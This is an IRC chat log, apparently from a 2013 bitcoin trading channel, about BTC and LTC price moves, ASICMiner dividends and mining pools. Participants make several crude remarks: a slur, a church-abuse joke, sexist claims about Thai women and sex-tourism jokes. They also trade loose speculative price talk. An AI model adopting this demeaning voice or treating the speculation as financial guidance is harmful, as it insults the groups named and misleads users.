12hrs? Mar 05 07:19:57 it's just nuts Mar 05 07:20:07 way overpiced Mar 05 07:20:11 ponzi. Mar 05 07:20:30 throwing cash at this thing and losing out Mar 05 07:20:44 how are you losing out ? Mar 05 07:20:54 i dont know Mar 05 07:21:02 still plenty of atmosphere for this bubble Mar 05 07:21:27 tell me if you think this is a good idea Mar 05 07:21:43 yes Mar 05 07:21:46 from now till end of the year i'm not going to sell any btc and just keep buying and buying up till end of the year Mar 05 07:21:57 thats what everyone else is doing Mar 05 07:22:02 so anything under 100$ is good right? Mar 05 07:22:09 damn 37.7 Mar 05 07:22:10 haha how should i know ?! Mar 05 07:22:43 what kind of bitcoin messiah are you? Mar 05 07:23:04 me ?! Mar 05 07:23:19 i guess not! Mar 05 07:23:21 :) Mar 05 07:23:37 http://blockchain.info/pools?timespan=4days Mar 05 07:23:42 mp, you obv server a paternal role here Mar 05 07:23:44 this is ther sound of btcguild crushing everyone Mar 05 07:23:45 i just need to know Mar 05 07:23:48 peeps gonna ask for guidance Mar 05 07:23:53 do we have a chance of hitting 500 onday? Mar 05 07:24:06 well ok, but ask me for guidance about how to stuff the vagoo, not about wtf the price will be Mar 05 07:24:06 we have a chacne to hit many numbers Mar 05 07:24:28 BitHub in principle we have a chance to hit any finite ratio within a finite interval. Mar 05 07:24:40 oh jesus Mar 05 07:24:51 deepbit + 50btc + slush < btc guild. Mar 05 07:24:56 i should have had a bet up for this Mar 05 07:26:13 if you make a bet for any pool vs BTCguild, that pool's userbase will grow Mar 05 07:30:27 there i submitted one Mar 05 07:31:12 i think i just now got the reason for naming assbot it's name Mar 05 07:31:47 should be trollbot Mar 05 07:33:32 someone shuld make buttobt Mar 05 07:33:58 just change everything to butt Mar 05 07:34:00 buttsets Mar 05 07:34:13 it's much more politically correct Mar 05 07:34:32 ok buttbles Mar 05 07:35:02 maybe buttbot can kick spammers (spam detected) Mar 05 07:35:24 buttbles works Mar 05 07:35:25 buttbot and assbot cvould have an assbutt baby Mar 05 07:35:43 (if you google the urban dictionary definition of grubbles, that is) Mar 05 07:35:55 Would it be possible to definively know if someone bought the entire Gox ask wall for one moment? Mar 05 07:36:20 no Mar 05 07:36:29 volume Mar 05 07:36:55 what about bots Mar 05 07:37:52 wouldn't it be represented visually on goxlive by the center line touching the right side? Mar 05 07:38:27 or i guess it would move Mar 05 07:38:30 meh Mar 05 07:38:44 thought it might a decent bet Mar 05 07:38:53 be Mar 05 07:41:45 not rly. Mar 05 07:41:51 you still couldnt tell if there were 100 people buying coins or 1 Mar 05 07:42:23 oh well Mar 05 07:42:50 unless you were magicaltux Mar 05 07:46:45 http://polimedia.us/dtng/c/src/13624623944.gif Mar 05 07:47:43 the force is strong in that one Mar 05 07:47:48 lol Mar 05 07:48:41 since when do stormtroopers wear sheets Mar 05 07:48:54 since katrina Mar 05 07:49:00 blew away their other gear Mar 05 07:49:24 everything but their stormtrooper helmet? Mar 05 07:49:29 thats a bit ironic isnt it? Mar 05 07:49:33 one of your camping trips again mircea? Mar 05 07:49:34 i guess so. yeah Mar 05 07:49:38 looks like he's still getting blown away Mar 05 07:49:47 hiyooooo! Mar 05 07:49:50 BitHub no, i'm not geek enough Mar 05 07:50:02 mircea_popescu: youre missing out Mar 05 07:50:17 prolly Mar 05 07:50:24 haha Mar 05 07:52:23 http://www.theregister.co.uk/2013/03/05/bicyclists_as_polluters/ When contacted by the Seattle Bike Blog, representative Orcutt stuck to his guns. "You would be giving off more CO2 if you are riding a bike than driving in a car," he said, but he admitted that he had not "done any analysis" Mar 05 07:55:07 "Well I was looking for a trader to grab 5 bitcoins from for days,and this asshole pm'ed me saying he had them. I should've known better,but was desperate and time was of the essence. I really needed these 5 bitcoins for an emergency too. Anyway I gave him my mpak and receipt and he hasnt been back since (3 days)." Mar 05 07:55:18 what may that emergency have been' Mar 05 07:55:59 drugs Mar 05 07:56:03 btc4cam.com Mar 05 07:56:24 drugs Mar 05 07:56:49 he needed to save his kidnapped daughter from human traffickers, using mostly karate chops Mar 05 07:57:00 and bitcoins Mar 05 08:01:11 ;;ticker Mar 05 08:01:11 BTCUSD ticker | Best bid: 37.65364, Best ask: 37.76034, Bid-ask spread: 0.10670, Last trade: 37.65364, 24 hour volume: 52475.05497893, 24 hour low: 34.34200, 24 hour high: 37.76034, 24 hour vwap: 35.85542 Mar 05 08:02:18 https://bitcointalk.org/index.php?topic=149198.0 Mar 05 08:02:22 ;;title Mar 05 08:02:23 (title ) -- Returns the HTML ... of a URL. Mar 05 08:02:29 ;;title https://bitcointalk.org/index.php?topic=149198.0 Mar 05 08:02:31 Bitcoin protocol broken? Mar 05 08:06:31 dat wall at 37 Mar 05 08:12:42 https://bitcointalk.org/index.php?topic=82184.msg1581015#msg1581015 Mar 05 08:12:48 lulzy. Mar 05 08:13:58 mp check out he blocks http://blockchain.info/ Mar 05 08:14:04 7 in 21 mins Mar 05 08:14:44 le ouch Mar 05 08:15:02 so is there anything to this story about asicminer chips blowing out like baloons or just bs ? Mar 05 08:15:56 asicminer has not been proven to mine over 5th Mar 05 08:16:06 we seem to have hit a wall and no one knows why Mar 05 08:16:21 :/ Mar 05 08:16:23 what? Mar 05 08:16:28 this could be for 1000 different reasons Mar 05 08:16:39 im not worried Mar 05 08:16:43 i am Mar 05 08:16:47 the chips blowing out i call bs Mar 05 08:16:47 wtf Mar 05 08:17:23 clearly they are mining like crazy... also i expect the next dividend to be crazy Mar 05 08:18:07 well which is it, like crazy or hit a wall ? Mar 05 08:18:59 the forum post don't look good Mar 05 08:23:08 friedcat said they were having power problems Mar 05 08:23:10 <[\\\]> why would the next dividend by crazy? Mar 05 08:23:47 <[\\\]> they've onyl paid out 30% of ipo to date and once they hit that threshold, twice as many shares will be collecting future dividends Mar 05 08:24:05 <[\\\]> be*, only* Mar 05 08:24:07 first dividend they took out paying off a lot of debt, i assume second dividend all debt has been delat with Mar 05 08:24:14 here we go Mar 05 08:24:40 <[\\\]> and what about in 2 weeks when 300 avalons finally arrive? Mar 05 08:24:44 <[\\\]> and bfl starts shipping? Mar 05 08:24:52 i said next dividend, not in a month... Mar 05 08:25:02 isn't div monthly ? Mar 05 08:25:10 every wednesday in OP Mar 05 08:25:12 <[\\\]> its whenever friedcata gets to it Mar 05 08:25:24 weekly ? that's kinda silly. Mar 05 08:25:26 but anyway Mar 05 08:25:27 op says weekly and every wednesday... Mar 05 08:25:47 will that happen i dont know... Mar 05 08:25:53 but i bought assuming it would... Mar 05 08:25:57 <[\\\]> mircea_popescu: some say thats not soon enough Mar 05 08:26:08 <[\\\]> you know, miners should be paid instantaneously Mar 05 08:26:12 sweet weekly Mar 05 08:26:14 might get changed to thursday however cuz of last week but i expect weekly and i expect this week to be like .05 maybe Mar 05 08:26:33 each share? Mar 05 08:26:39 <[\\\]> how long did they mine before paying the first dividend? Mar 05 08:26:41 [\\\] heh. yeah. Mar 05 08:26:43 they got atleast 15% of the network right? Mar 05 08:26:48 <[\\\]> no Mar 05 08:26:52 <[\\\]> well, close Mar 05 08:26:54 <[\\\]> ;;nethahs Mar 05 08:26:54 Error: "nethahs" is not a valid command. Mar 05 08:26:57 <[\\\]> ;;nethash Mar 05 08:26:58 36234.3320016 Mar 05 08:27:07 they mined for what, 2 weeks? Mar 05 08:27:08 awww yeah i hope its .05 per share Mar 05 08:27:20 <[\\\]> 2 they mined for 2 weeks, paid debt, paid .03 div Mar 05 08:27:24 <[\\\]> so now they've mined for 1 week Mar 05 08:27:27 <[\\\]> and diff went up Mar 05 08:27:33 <[\\\]> expecting .05 is a bit much Mar 05 08:27:48 okay i did the math, maybe .02 is beter Mar 05 08:27:52 my guess was high Mar 05 08:28:16 still a very nice weekly div Mar 05 08:28:21 <[\\\]> it won't last Mar 05 08:28:26 i kow Mar 05 08:28:29 <[\\\]> another week, another 15% diff jump Mar 05 08:28:30 i never said it would:) Mar 05 08:28:33 or will it? Mar 05 08:28:35 <[\\\]> another week, 300 avalons Mar 05 08:28:45 but if 5th gos to 12 th and 12 th goes to 60 th.... Mar 05 08:28:57 <[\\\]> Chaang-Noi: after .1, your div gets cut in half Mar 05 08:28:58 right Mar 05 08:28:58 i thought batch one shipped in jan? :) Mar 05 08:29:03 <[\\\]> so it takes doubling just to keep even Mar 05 08:29:18 <[\\\]> it was never to ship in jan Mar 05 08:29:21 yeah the .1 get cut in half, but that money gets invested into new asics right? Mar 05 08:29:38 new asics means more TH/s... Mar 05 08:29:47 <[\\\]> that will cost money Mar 05 08:29:52 <[\\\]> those shares aren't the company Mar 05 08:29:52 im pretty happy with asicminer, and if bfl keeps failing... Mar 05 08:29:56 <[\\\]> friedcat has to get paid Mar 05 08:30:06 <[\\\]> those three own the other half Mar 05 08:30:25 ahh. then they will be rich mofos... Mar 05 08:30:29 <[\\\]> yeah Mar 05 08:30:58 still im pretty happy Mar 05 08:31:02 <[\\\]> perhaps Mar 05 08:31:12 !ticker btct asicminer-pt Mar 05 08:31:13 <[\\\]> anyone paying .6/share is gonna take a long while to pay off Mar 05 08:31:19 aww assbot! Mar 05 08:31:29 im going to assume they keep 10% network for a year and see what that brings in... Mar 05 08:31:32 [\\\] last i saw it was like 100 btc Mar 05 08:31:43 <[\\\]> huh? Mar 05 08:31:50 <[\\\]> who is paying 100 btc a share? Mar 05 08:31:54 no, total volume Mar 05 08:31:54 <[\\\]> I've got a bunch to sell then Mar 05 08:31:56 <[\\\]> oh Mar 05 08:31:58 i think he means vol Mar 05 08:32:01 <[\\\]> yeah, no depth Mar 05 08:32:09 <[\\\]> point still remains Mar 05 08:32:20 <[\\\]> anyone buying at .6 will take a while to pay off Mar 05 08:32:26 you dont necessarily need to "pay off" the share at all Mar 05 08:32:29 you can sell it Mar 05 08:32:35 ;;calc 25 x 6 x 24 x 365 Mar 05 08:32:35 Error: invalid syntax (, line 1) Mar 05 08:32:36 throwing * a litte* away on a long bet isn't necessarily a bad strategy Mar 05 08:32:37 <[\\\]> assuming the company survives Mar 05 08:32:51 <[\\\]> mircea_popescu: aye, been there, done that ;) Mar 05 08:32:54 :p Mar 05 08:33:28 <[\\\]> until they can answer why they're stuck on 5 Mar 05 08:33:30 <[\\\]> I'm jaded Mar 05 08:33:33 okay assuming they only keep 105 of the network on average for a year that is .3285 in two years double that to about what it is selling for now... Mar 05 08:33:46 <[\\\]> two years in bitcoin is forever Mar 05 08:34:08 yeah i sold some at .6 but keeping the alst half, Mar 05 08:34:18 also if they get 20% on average for a eyar that is much higher Mar 05 08:34:23 they really should give info about what the hold up is Mar 05 08:34:24 <[\\\]> what happens when the sec decides to start investigating us holders? Mar 05 08:34:27 and bfl fucks up hard and they get 40%.... Mar 05 08:34:34 they won't get 20% for a year tho, that's excessive. Mar 05 08:34:40 <[\\\]> Chaang-Noi, now you're just being stupid Mar 05 08:34:40 sec goes to china lol?? wtf Mar 05 08:34:46 at these prices market will be awash in real asics this year Mar 05 08:34:48 <[\\\]> Chaang-Noi, the sec doesn't have to go to china Mar 05 08:34:58 im in thailand i dont give a shit... Mar 05 08:35:05 they cant get my wallet i dont care Mar 05 08:35:11 <[\\\]> ah right, because you're untouchable Mar 05 08:35:13 friedcat has my shares Mar 05 08:35:22 <[\\\]> is that why you were pissing your pants about your passthrough? Mar 05 08:35:23 yay for not being USA resident Mar 05 08:35:29 the sec is not realisticly going to fly to china or thailand or hack my wallet... Mar 05 08:35:49 you know they got cia agents there? Mar 05 08:35:51 sec might take down a glbse like exchange that asicminer is not involved with... Mar 05 08:36:06 cia right now is not after btc... mostly drugs Mar 05 08:36:15 <[\\\]> oh yeah? Mar 05 08:36:20 <[\\\]> you're an expert on the cia now? Mar 05 08:36:22 ... Mar 05 08:36:35 i was in a country similar to thailand Mar 05 08:36:40 hotel blew up Mar 05 08:36:42 the agents here in thailand that i know are mostly involved in the drug trafficing stuff in the north Mar 05 08:36:45 cia, sec no one knows shit about what will happen in those regards Mar 05 08:36:52 btc is not a US thing Mar 05 08:36:53 some cia agents came and got the bodies Mar 05 08:36:58 the mayor was pissed Mar 05 08:37:04 the sec cant do shit in thail;and or china.. thinking they can is silly Mar 05 08:37:05 https://bitcointalk.org/index.php?topic=149130.0;all Mar 05 08:37:08 jesus the retard parade Mar 05 08:37:50 <[\\\]> lol Mar 05 08:37:56 <[\\\]> its not even a new concept Mar 05 08:38:08 it's not even a concept really. Mar 05 08:38:12 <[\\\]> (jesus, retards, parades) Mar 05 08:38:30 o o Mar 05 08:38:45 lol Mar 05 08:38:46 <[\\\]> ;;seen usagi Mar 05 08:38:46 usagi was last seen in #bitcoin-assets 17 hours, 39 minutes, and 51 seconds ago: You won't hold the bitcoins, they will. They'll just tell you how many bitcoins you "own". Mar 05 08:38:48 that came out nice Mar 05 08:38:49 no diff than the otc wot, no? Mar 05 08:39:22 https://bitcointalk.org/index.php?topic=130117.msg1583670#msg1583670 Mar 05 08:39:24 gain trust, spend it on an adequate payout Mar 05 08:39:30 help me -assets. is he saying that like it's a bad thing ? Mar 05 08:40:08 he's saying they're after you Mar 05 08:40:10 <[\\\]> I can't be bothered to figure it out Mar 05 08:40:19 and will get you as soon as they can find you Mar 05 08:40:19 <[\\\]> its not like what he meant changes anything Mar 05 08:40:42 <[\\\]> I don't bother reading that particular forum much anymore Mar 05 08:40:58 [\\\] i get the selected bits. Mar 05 08:41:10 <[\\\]> I'm not sexing someone to watch it for me ;) Mar 05 08:41:23 lol Mar 05 08:41:32 help me -assets. is he saying that like it's a bad thing ? Mar 05 08:42:09 <[\\\]> lol ThickAsThieves Mar 05 08:42:16 <[\\\]> 50 btc Mar 05 08:42:19 :) Mar 05 08:42:52 <[\\\]> its like that 100 btc roulette from back in the day Mar 05 08:42:59 <[\\\]> everyone passed around 100 btc as if it meant something Mar 05 08:43:15 <[\\\]> then again, it was only worth about $200 at the time Mar 05 08:43:52 I wonder if I got the Op's heart racing Mar 05 08:44:11 <[\\\]> probably not his heart.. Mar 05 08:44:15 hehe Mar 05 08:44:34 <[\\\]> ;;ticker Mar 05 08:44:34 BTCUSD ticker | Best bid: 37.87000, Best ask: 37.99000, Bid-ask spread: 0.12000, Last trade: 37.99000, 24 hour volume: 53627.32358050, 24 hour low: 34.37000, 24 hour high: 37.99000, 24 hour vwap: 35.91832 Mar 05 08:44:37 <[\\\]> oh nice Mar 05 08:44:41 terry gilliam renounced his u.s. citizenship Mar 05 08:44:45 <[\\\]> almost $38 Mar 05 08:44:49 <[\\\]> wtf is terry gilliam Mar 05 08:44:54 pretty soon there's not going to be any us citizens left. Mar 05 08:45:10 no wall until 40, and that is only 2k btc Mar 05 08:45:12 [\\\] possibly the only american filmmaker worth the notice ? Mar 05 08:45:28 <[\\\]> he renounced his citizenship in 2006 Mar 05 08:45:33 <[\\\]> way to be 6 years late Mar 05 08:45:40 <[\\\]> are you reading your news on the wayback machine? Mar 05 08:45:52 where would be a good place for an american to leave for? Mar 05 08:46:00 [\\\] twitter. Mar 05 08:46:06 <[\\\]> ThickAsThieves: I heard North Korea is nice this time of year. Mar 05 08:46:08 ThickAsThieves romania. Mar 05 08:46:25 <[\\\]> TPB is going to base themselves out of NK Mar 05 08:46:28 they like americans? Mar 05 08:46:37 <[\\\]> If you play basketball Mar 05 08:46:38 i havent been out of the country in a while Mar 05 08:46:43 i imagine everyone hates us Mar 05 08:46:51 ThickAsThieves not particularly. Mar 05 08:46:54 <[\\\]> ThickAsThieves: got any kids? Mar 05 08:46:59 not yet Mar 05 08:47:00 soon Mar 05 08:47:05 <[\\\]> you'd be pretty popular in italy soon ;) Mar 05 08:47:18 <[\\\]> well, not you Mar 05 08:47:20 <[\\\]> but the kids Mar 05 08:47:27 <[\\\]> serving the church Mar 05 08:47:27 lol wut? Mar 05 08:47:32 lmao Mar 05 08:47:33 we have catholic chuches here too Mar 05 08:47:46 Mar05 06:46:59 mtgox x8 47.4170 @ 38.08999282 USD Mar 05 08:48:01 <[\\\]> ;;market asks 40 Mar 05 08:48:05 There are currently 6343.2892 bitcoins offered at or under 40.0 USD, worth 250361.11051 USD in total. | Data vintage: 0.0016 seconds Mar 05 08:48:06 speaking of which, have they got a new pope yet ? Mar 05 08:48:13 <[\\\]> haven't started yet Mar 05 08:48:18 <[\\\]> not before next week Mar 05 08:48:27 <[\\\]> but most likely before the end of the month Mar 05 08:48:34 is there a bitcoin bet for it? Mar 05 08:48:35 <[\\\]> they want a new one for the sunday before easter sunday Mar 05 08:49:45 <[\\\]> https://sphotos-a.xx.fbcdn.net/hphotos-snc7/429649_560954803925535_1871233442_n.jpg Mar 05 08:50:51 <[\\\]> ;;ticker Mar 05 08:50:51 BTCUSD ticker | Best bid: 39.00000, Best ask: 39.01100, Bid-ask spread: 0.01100, Last trade: 39.00000, 24 hour volume: 55901.80471473, 24 hour low: 34.37000, 24 hour high: 39.00000, 24 hour vwap: 36.01882 Mar 05 08:50:53 <[\\\]> woo Mar 05 08:50:53 i wanta new pope:) Mar 05 08:50:54 <[\\\]> 39 Mar 05 08:50:58 i dunno that there's a bet for it Mar 05 08:51:04 howly. shit Mar 05 08:51:11 yeas holy shit Mar 05 08:51:27 fuck me running Mar 05 08:51:28 there needs to be Mar 05 08:51:30 for teh lulz Mar 05 08:51:36 <[\\\]> Chaang-Noi: no wonder you want a new pope Mar 05 08:51:41 <[\\\]> I didn't realize you were kinky like that Mar 05 08:51:45 <[\\\]> I'm sure they're into that. Mar 05 08:52:51 im open minded Mar 05 08:52:59 ;;asks 50 Mar 05 08:52:59 There are currently 16268.94 bitcoins offered at or under 50.0 USD, worth 722719.888071 USD in total. | Data vintage: 32.5782 seconds Mar 05 08:53:09 open kneed matters mroe than open minded Mar 05 08:53:22 ;;asks 40 Mar 05 08:53:22 There are currently 4749.7778 bitcoins offered at or under 40.0 USD, worth 188971.229954 USD in total. | Data vintage: 55.8562 seconds Mar 05 08:54:33 exciting times Mar 05 08:54:34 Jesus Mar 05 08:54:51 <[\\\]> fuck me running << that sounds a bit more than open minded Mar 05 08:55:13 not in thailand... Mar 05 08:56:02 you should see some of the shows for tourists Mar 05 08:56:19 mmm thai girls Mar 05 08:56:30 getting harder to pick them these days Mar 05 08:56:40 <[\\\]> BitHub: are you sure its a girl? Mar 05 08:56:49 haha Mar 05 08:56:52 Chaang-Noi they fuck running ? Mar 05 08:57:06 <[\\\]> mircea_popescu: they have to.. cia and all Mar 05 08:57:36 lol Mar 05 08:57:48 mp they will do what every you want them to do Mar 05 08:58:12 "Vatican dismisses reports linking pope's resignation to gay conclave discovery" Mar 05 08:58:19 Chaang-Noi that's not remarkable is it ? Mar 05 08:58:22 <[\\\]> of course they did Mar 05 08:58:43 thai girls are submissive by nature Mar 05 08:59:04 the feminist bs did not happen here yet... Mar 05 08:59:37 ;;ticker Mar 05 08:59:38 BTCUSD ticker | Best bid: 38.99000, Best ask: 39.20000, Bid-ask spread: 0.21000, Last trade: 38.99000, 24 hour volume: 59388.87350464, 24 hour low: 34.37000, 24 hour high: 39.20000, 24 hour vwap: 36.19533 Mar 05 08:59:44 Eh, $39. Mar 05 08:59:47 Its cheap Mar 05 08:59:55 ;;goxlag Mar 05 08:59:56 0.833684 seconds Mar 05 09:01:11 <[\\\]> meanwhile the rates on bitfinex usd keep going up Mar 05 09:01:25 <[\\\]> are there bets on how long bitfinex goes before a default? Mar 05 09:02:42 "Canon law states that a resignation must be made freely and properly manifested and that the pope resigning must be of sound mind." Mar 05 09:02:48 kickass. insane pope may not resign. Mar 05 09:02:59 [\\\] not afaik Mar 05 09:03:10 may be a good bet to hedge Mar 05 09:06:24 <[\\\]> insane pope would probably find the wrong side of a pillow Mar 05 09:06:50 <[\\\]> according to Luke-Jr, there is no pope Mar 05 09:06:58 <[\\\]> there has been no pope for quite some time Mar 05 09:07:57 mircea_popescu: lol, interesting observation Mar 05 09:10:18 <[\\\]> g'night folks Mar 05 09:10:39 night Mar 05 09:10:54 yeah that is the first thing i saw too, crazy pope cant quit... Mar 05 09:11:08 but then again, i guess a pope cant really be crazy or if so gods will? Mar 05 09:12:18 it makes sense in a way, but at the same time creates practical problems Mar 05 09:12:46 :) Mar 05 09:13:18 id geuss if the pope was crazy crazy he would just be locked in his room and they would say he is sick Mar 05 09:13:48 why is 39 to 40 so much slow than 38 to 39 :( Mar 05 09:14:13 ;;ticker Mar 05 09:14:14 BTCUSD ticker | Best bid: 38.90000, Best ask: 38.91000, Bid-ask spread: 0.01000, Last trade: 38.91000, 24 hour volume: 61314.60667593, 24 hour low: 34.37000, 24 hour high: 39.50000, 24 hour vwap: 36.31836 Mar 05 09:14:17 Oh no.. Mar 05 09:14:20 We're crashing!! Mar 05 09:16:16 ;bids 38 Mar 05 09:16:28 ;;bids 38 Mar 05 09:16:33 There are currently 1824.2403 bitcoins demanded at or over 38.0 USD, worth 70529.8432092 USD in total. | Data vintage: 0.0079 seconds Mar 05 09:16:51 wow that was fast depth Mar 05 09:17:42 almost 30 euro Mar 05 09:18:38 ;;bids 37] Mar 05 09:18:38 Error: Spurious "]". You may want to quote your arguments with double quotes in order to prevent extra brackets from being evaluated as nested commands. Mar 05 09:18:41 ;;bids 37 Mar 05 09:18:45 There are currently 7610.7434 bitcoins demanded at or over 37.0 USD, worth 285610.913583 USD in total. | Data vintage: 0.0067 seconds Mar 05 09:19:02 almost $300,000 came in since 27... Mar 05 09:19:23 that is just crazy, i wonder once sellers run out of coins if we dont go to $100 in a week... Mar 05 09:23:51 umm guys. I wanna get rich as much as the next person but.. isn't this a little to fast? Mar 05 09:24:28 yeah Mar 05 09:24:39 maybe its making up for that mtgox hack Mar 05 09:25:33 eh.. Mar 05 09:25:35 no, this is people finally realizing the dollar is over. Mar 05 09:25:39 Idk. it doesnt feel to real to me Mar 05 09:25:45 and i hope u guys are right but.. Mar 05 09:25:49 this feels wierd Mar 05 09:26:02 I wrote a bullshit bull chart Mar 05 09:26:13 draper is a big name Mar 05 09:26:14 i say bullshit because.. it wasn't bullish enough and i was just joking Mar 05 09:26:17 damn Mar 05 09:26:24 lol Mar 05 09:26:57 http://i45.tinypic.com/2uz8ao3.png Mar 05 09:26:58 this. Mar 05 09:27:01 like really Mar 05 09:27:01 lol Mar 05 09:27:14 I'll just sit this rocket out, hopefully I don't fall Mar 05 09:27:27 its going inverted Mar 05 09:28:24 ;;ticker Mar 05 09:29:04 next up boeing accepts bitcoin Mar 05 09:29:19 srsly over 39 ?! Mar 05 09:29:20 40 can't hold. Mar 05 09:29:22 we're 50. Mar 05 09:29:36 yawn Mar 05 09:29:37 it jumped 1.25 a tick Mar 05 09:29:52 wake me up when bitcoins are at least 5 grand each, then I'll be interested Mar 05 09:30:14 and a millionaire too Mar 05 09:30:15 lol Mar 05 09:30:26 meanwhile i'm worth over 1 bn lei, which is remarkably enough not the first time Mar 05 09:31:24 damn Mar 05 09:31:26 heh Mar 05 09:32:19 it sounds better than it is tho. romania cut 4 zeroes in like 2004 Mar 05 09:32:36 pretty much every third guy was a billionaire before that. Mar 05 09:32:53 how much is that in us? Mar 05 09:33:09 298846000.00 Mar 05 09:33:19 that's a big number Mar 05 09:33:23 currently it's like 0.3 ish leis to the dollar Mar 05 09:33:33 jesus are you serious? Mar 05 09:33:41 vice versa Mar 05 09:33:42 sorry Mar 05 09:34:06 bout 100ish leis to the bitcoin Mar 05 09:34:23 far out Mar 05 09:35:33 ;;ticker Mar 05 09:35:34 BTCUSD ticker | Best bid: 38.80000, Best ask: 38.81100, Bid-ask spread: 0.01100, Last trade: 38.80000, 24 hour volume: 62576.26296810, 24 hour low: 34.37000, 24 hour high: 39.50000, 24 hour vwap: 36.37897 Mar 05 09:35:51 lei? Mar 05 09:35:57 romonian money? Mar 05 09:36:00 yea Mar 05 09:36:49 k guys we are crashing Mar 05 09:36:51 ;;ticker Mar 05 09:36:52 BTCUSD ticker | Best bid: 38.80000, Best ask: 38.83266, Bid-ask spread: 0.03266, Last trade: 38.81100, 24 hour volume: 62580.46590463, 24 hour low: 34.37000, 24 hour high: 39.50000, 24 hour vwap: 36.37914 Mar 05 09:36:56 see. its not 40 Mar 05 09:37:02 see you at single digits! Mar 05 09:37:11 mircea_popescu: do you do philanthropic stuff with your wealth? Mar 05 09:37:20 occasionally. Mar 05 09:37:28 he goes boat rowing Mar 05 09:37:39 his PR gave this dude 10 BTC to stick a sharpie up his ass Mar 05 09:37:43 with teh girls Mar 05 09:37:48 81 million usd is not bad Mar 05 09:37:49 lol Mar 05 09:37:49 thats philantrophic Mar 05 09:38:01 hey, i paid for otc/gpg lessons Mar 05 09:38:06 and for like, story writing Mar 05 09:38:11 that too Mar 05 09:38:12 lol Mar 05 09:38:23 and i forget. variosu things Mar 05 09:38:32 are you in a big mansion? Mar 05 09:38:33 but principally helping poor tall girls through college Mar 05 09:38:37 nah Mar 05 09:38:41 lemme see where was it Mar 05 09:38:59 81 million Mar 05 09:39:01 but principally helping poor tall girls through college yeah... i know that... Mar 05 09:39:07 jesus!!!!! Mar 05 09:39:11 lucky for me uni is cheap in thailand Mar 05 09:39:38 so Mar 05 09:39:41 sup Mar 05 09:39:42 but degrees from other countries are worth shit here in canada Mar 05 09:40:00 maybe from US and UK... the rest are pretty much worthless here Mar 05 09:40:12 we have doctors who drive cabs Mar 05 09:40:18 lul Mar 05 09:40:20 2 million btc = 81 million, you dont ahve 2 million btc do you? :) Mar 05 09:40:53 much of this wealth must be on paper and in things that if sold out to cash would crash the market Mar 05 09:41:07 still not bad and congrats Mar 05 09:41:22 yeah man that's insane :) well done. Mar 05 09:41:31 i would be happy with just 1 million Mar 05 09:41:39 but 81? god dayam Mar 05 09:42:21 wha ? Mar 05 09:42:31 im well over 1 million baht :) Mar 05 09:42:51 yeah i got about a 1 million pesos as well :P Mar 05 09:42:54 im well over 1 million cents Mar 05 09:43:04 also in yen and pesos Mar 05 09:43:05 lol Mar 05 09:43:14 but i live in thailand lol Mar 05 09:43:34 is 1 million baht alot? Mar 05 09:43:57 CoinLab Current Price: $38.91 24m ago Mar 05 09:44:01 o hey BitHub this one's for you http://trilema.com/2011/test-de-cultura-vizuala-xii/ Mar 05 09:44:31 where's teh gap? Mar 05 09:44:47 hehe she got some meat on her mate Mar 05 09:45:10 nice wide curves tho Mar 05 09:45:15 gusto Mar 05 09:45:46 anyway, i had some pix with m,y "mansion" but now can't motherfuckin find em Mar 05 09:45:55 oh? Mar 05 09:46:10 6000 baht is the average wage here so 1,000,000 baht is about 14 years of average work Mar 05 09:46:27 ahh okey chang Mar 05 09:46:52 what's the bitcoin market like there? Mar 05 09:46:56 so yeah its okay but no, its not bill gates rich either Mar 05 09:47:00 many people into it? Mar 05 09:47:05 there are a lot of expats who do computer work Mar 05 09:47:09 thailand is shokcingly active Mar 05 09:47:14 also russians here... Mar 05 09:47:22 tourist as well Mar 05 09:47:27 i think there are three small btc exchagnes in thailand Mar 05 09:47:37 oh nice stuff Mar 05 09:47:43 i'll be in philippines next year Mar 05 09:47:45 from time to time a fourum user will call me up and be like shit, ran out of money, will you take btc... Mar 05 09:48:08 they are mostly drunk tourists Mar 05 09:48:35 bithub what are u doing there Mar 05 09:48:46 going to get bowjobs... Mar 05 09:48:51 i'll tell you once i'm there Mar 05 09:49:15 aha, found it. http://trilema.com/2011/mutatis-mutandis/ Mar 05 09:49:33 good to know there's some bitcoin action in Thailand :) Mar 05 09:49:44 i'm in Australia myself at the moment Mar 05 09:50:12 i hear they decapitate tourists in the philippines. watch out Mar 05 09:50:35 ya they're do Mar 05 09:50:39 they Mar 05 09:50:42 especially in mindanao Mar 05 09:50:54 mp what did you do for the school girls? :) Mar 05 09:51:28 btc is 40 at "rock" waht exchagne is "rock" ? Mar 05 09:51:31 nothing Mar 05 09:51:36 you get that shit in the mailbox over here Mar 05 09:51:42 Mar05 07:52:53 rock 46.9000 @ 40.00 USD Mar 05 09:51:49 i think mircea makes pornos Mar 05 09:51:50 therock ? Mar 05 09:52:02 is it an exchagne i dont know of? Mar 05 09:52:22 i think it;s the exchange noone knows of. Mar 05 09:52:27 ;;ticker Mar 05 09:52:28 BTCUSD ticker | Best bid: 38.92087, Best ask: 38.94809, Bid-ask spread: 0.02722, Last trade: 38.92087, 24 hour volume: 63162.27334246, 24 hour low: 34.41000, 24 hour high: 39.50000, 24 hour vwap: 36.41416 Mar 05 09:52:55 what lanuage is that on your site mircea? Mar 05 09:53:03 romanian? Mar 05 09:53:05 romanian Mar 05 09:53:12 ahh k Mar 05 09:53:24 ;;asks 39 Mar 05 09:53:29 There are currently 107.26203 bitcoins offered at or under 39.0 USD, worth 4182.97936833 USD in total. | Data vintage: 0.0009 seconds Mar 05 09:54:43 ltc .147 crazy Mar 05 09:55:02 https://bitcointalk.org/index.php?topic=148832.msg1584465#msg1584465 Mar 05 09:55:05 the plot thinnens. Mar 05 09:55:09 is it worth getting into ltc? Mar 05 09:55:13 been thinking about it Mar 05 09:55:17 altbot> Mar05 07:52:08 btc-e x4 2546.4950 @ 0.147000 USD Mar 05 09:57:17 kako actually went there? Mar 05 09:58:18 damn LTC Mar 05 09:58:25 perhaps I was wrong Mar 05 09:58:35 I should get back at LTC.. maybe Mar 05 09:59:06 ThickAsThieves yes. Mar 05 09:59:26 fuck me. I sold 10k LTC for like 5 cents each Mar 05 10:01:20 ltc just went to 15.5 Mar 05 10:01:37 ? Mar 05 10:02:00 fuck ME. I didn't sell my LTC Mar 05 10:02:04 :) Mar 05 10:02:05 altbot> Mar05 07:57:02 btc-e 100.0000 @ 0.155000 USD Mar 05 10:04:03 lol Mar 05 10:04:21 aight, i'll ride the LTC train again. choochoo Mar 05 10:10:33 yeah ltc was way undervalued, but i did not think it would pop until btc started to go down Mar 05 10:11:28 https://www.ozcoin.net/content/user-top-20 Mar 05 10:12:25 ThickAsThieves the problem with that stuff is that if i want to i can bunch up some gpu miners Mar 05 10:12:47 